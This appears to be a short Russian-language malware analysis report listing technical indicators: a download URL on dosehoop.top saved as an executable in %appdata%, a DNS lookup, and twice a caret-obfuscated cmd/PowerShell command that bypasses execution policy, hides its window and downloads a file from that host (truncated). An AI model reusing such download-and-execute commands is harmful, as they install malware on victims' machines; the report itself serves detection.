Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OwERshE^ll^.Exe -^e^XE^c^UT^IOnP^OlIcy bypASs^ -^NOPR^OFi^l^e^ ^-w^iND^o^ws^ty^Le ^h^I^ddEn (^N^e^w-^O^BJEct ^Sy^STem.^n^e^t.W^EBcliEn^T).do^Wn^LOaDFIlE^('http://dosehoop.top/r...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /C "P^OwERshE^ll^.Exe -^e^XE^c^UT^IOnP^OlIcy bypASs^ -^NOPR^OFi^l^e^ ^-w^iND^o^ws^ty^Le ^h^I^ddEn (^N^e^w-^O^BJEct ^Sy^STem.^n^e^t.W^EBcliEn^T).do^Wn^LOaDFIlE^('http://dosehoop.top/r... (со скрытым окном)